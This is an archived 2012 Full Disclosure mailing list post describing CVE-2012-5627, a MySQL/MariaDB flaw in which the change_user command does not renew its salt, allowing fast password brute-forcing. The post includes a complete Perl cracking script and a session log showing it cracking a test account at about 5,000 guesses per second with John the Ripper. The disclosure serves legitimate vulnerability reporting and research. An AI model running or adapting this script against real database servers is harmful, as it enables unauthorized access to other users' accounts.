Headline
CVE-2012-5627: MySQL Local/Remote FAST Account Password Cracking
Oracle MySQL and MariaDB 5.5.x before 5.5.29, 5.3.x before 5.3.12, and 5.2.x before 5.2.14 does not modify the salt during multiple executions of the change_user command within the same connection which makes it easier for remote authenticated users to conduct brute force password guessing attacks.
Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev
Full Disclosure mailing list archives
From: king cope <isowarez.isowarez.isowarez () googlemail com>
Date: Mon, 3 Dec 2012 19:13:40 +0100
FAST Cracking of MySQL account passwords locally or over the network (post-auth)
(to the maintainers: you don’t need to patch this, looks alot like a minor bug, prolly documented :D)
I found a method to crack mysql user passwords locally or over the network pretty efficiently. During Tests it was possible to test 5000 passwords per second over the network. The method is as follows:
The attacker logs into the mysql server with an unprivileged account. There is a command in mysql called change_user, this command can be used as the name suggests to change a user during a mysql session. Since mysql is very fast in doing this it is much more powerful to crack passwords rather than reconnecting every time to the mysql server to brute force passwords (what would be VERY slow). Since the SALT does not change (and this is the weak point) in the change_user command it is a convienent way to crack passwords. (When connecting to mysql in each connection attempt the SALT is always different and sent out by the server).
Below is an example script and an example which uses John the Ripper’s capabilities to generate passwords.
The passwords “pass” for the user “crackme” is cracked in a matter of seconds. (about 100000 passwords are tested in 20 seconds)
cracking script
use Net::MySQL;
$|=1;
my $mysql = Net::MySQL->new( hostname => '192.168.2.3’, database => 'test’, user => "user", password => "secret", debug => 0, );
$crackuser = "crackme";
while(<stdin>) { chomp; $currentpass = $_;
$vv = join "\0", $crackuser, "\x14". Net::MySQL::Password->scramble( $currentpass, $mysql->{salt}, $mysql->{client_capabilities} ) . "\0"; if ($mysql->_execute_command("\x11", $vv) ne undef) { print "[*] Cracked! --> $currentpass\n"; exit; } }
example session:
C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo hn --incremental --stdout=5 | perl mysqlcrack.pl Warning: MaxLen = 8 is too large for the current hash type, reduced to 5 words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH words: 24573 time: 0:00:00:04 w/s: 4916 current: rap words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3 words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429 words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141 words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2 [*] Cracked! --> pass words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs Session aborted
Greetings,
Kingcope
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
MySQL Local/Remote FAST Account Password Cracking king cope (Dec 03)
Re: MySQL Local/Remote FAST Account Password Cracking Jeffrey Walton (Dec 04)
<Possible follow-ups>
MySQL Local/Remote FAST Account Password Cracking Paul van Bavel (Dec 05)
- Re: MySQL Local/Remote FAST Account Password Cracking Andres Riancho (Dec 05)
- Re: MySQL Local/Remote FAST Account Password Cracking Ulises2k (Dec 05)
Related news
MariaDB CONNECT Storage Engine Heap-based Buffer Overflow Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of MariaDB. Authentication is required to exploit this vulnerability. The specific flaw exists within the processing of SQL queries. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the service account. Was ZDI-CAN-16190.